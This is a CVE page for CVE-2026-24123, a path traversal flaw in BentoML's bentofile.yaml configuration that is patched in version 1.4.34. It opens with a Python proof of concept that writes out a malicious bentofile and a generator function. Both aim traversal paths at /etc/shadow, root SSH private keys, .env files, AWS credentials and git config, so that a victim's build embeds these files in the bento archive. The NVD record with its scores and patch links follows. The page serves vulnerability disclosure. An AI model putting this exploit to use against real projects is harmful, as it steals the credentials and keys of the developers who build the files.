CVE-2026-24123

#!/usr/bin/env python3 """ CVE-2026-24123 PoC - Malicious bentofile.yaml for BentoML Path Traversal This PoC demonstrates how an attacker can exfiltrate sensitive files via bentofile.yaml """ malicious_bentofile = """ service: "test:predict" description: | ../../../etc/passwd ../../../root/.ssh/id_rsa ../../../home/*/.env docker: setup_script: ../../../etc/shadow dockerfile_template: ../../../root/.bashrc conda: environment_yml: ../../../etc/environment labels: author: attacker purpose: sensitive_data_exfiltration """ # Alternative PoC using Python API def generate_malicious_bentofile(target_paths): """ Generate malicious bentofile.yaml to exfiltrate files Args: target_paths: List of file paths to exfiltrate """ paths_section = '\n'.join([f' ../../../{path}' for path in target_paths]) malicious_yaml = f""" service: "exfil:Predict" description: | {paths_section} docker: setup_script: ../../../etc/shadow labels: malicious: "true" """ return malicious_yaml # Example usage if __name__ == "__main__": targets = [ 'etc/passwd', 'root/.ssh/id_rsa', 'home/user/.env', '.aws/credentials', '.git/config' ] poc = generate_malicious_bentofile(targets) print("Generated malicious bentofile.yaml:") print(poc) print("\nNote: When victim builds this bentofile with 'bentoml build', ") print("the sensitive files will be embedded in the bento archive.")

{"cve": {"id": "CVE-2026-24123", "sourceIdentifier": "[email protected]", "published": "2026-01-26T23:16:08.460", "lastModified": "2026-02-03T15:07:55.700", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to version 1.4.34, BentoML's `bentofile.yaml` configuration allows path traversal attacks through multiple file path fields (`description`, `docker.setup_script`, `docker.dockerfile_template`, `conda.environment_yml`). An attacker can craft a malicious bentofile that, when built by a victim, exfiltrates arbitrary files from the filesystem into the bento archive. This enables supply chain attacks where sensitive files (SSH keys, credentials, environment variables) are silently embedded in bentos and exposed when pushed to registries or deployed. Version 1.4.34 contains a patch for the issue."}, {"lang": "es", "value": "BentoML es una librería de Python para construir sistemas de servicio en línea optimizados para aplicaciones de IA e inferencia de modelos. Antes de la versión 1.4.34, la configuración `bentofile.yaml` de BentoML permite ataques de salto de ruta a través de múltiples campos de ruta de archivo (`description`, `docker.setup_script`, `docker.dockerfile_template`, `conda.environment_yml`). Un atacante puede crear un bentofile malicioso que, cuando es construido por una víctima, exfiltra archivos arbitrarios del sistema de archivos al archivo bento. Esto permite ataques a la cadena de suministro donde archivos sensibles (claves SSH, credenciales, variables de entorno) son incrustados silenciosamente en los bentos y expuestos cuando se suben a registros o se despliegan. La versión 1.4.34 contiene un parche para el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bentoml:bentoml:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.34", "matchCriteriaId": "DE676E6B-09BB-4BB5-839C-CDA683332ADC"}]}]}], "references": [{"url": "https://github.com/bentoml/BentoML/commit/84d08cfeb40c5f2ce71b3d3444bbaa0fb16b5ca4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/bentoml/BentoML/releases/tag/v1.4.34", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-6r62-w2q3-48hf", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}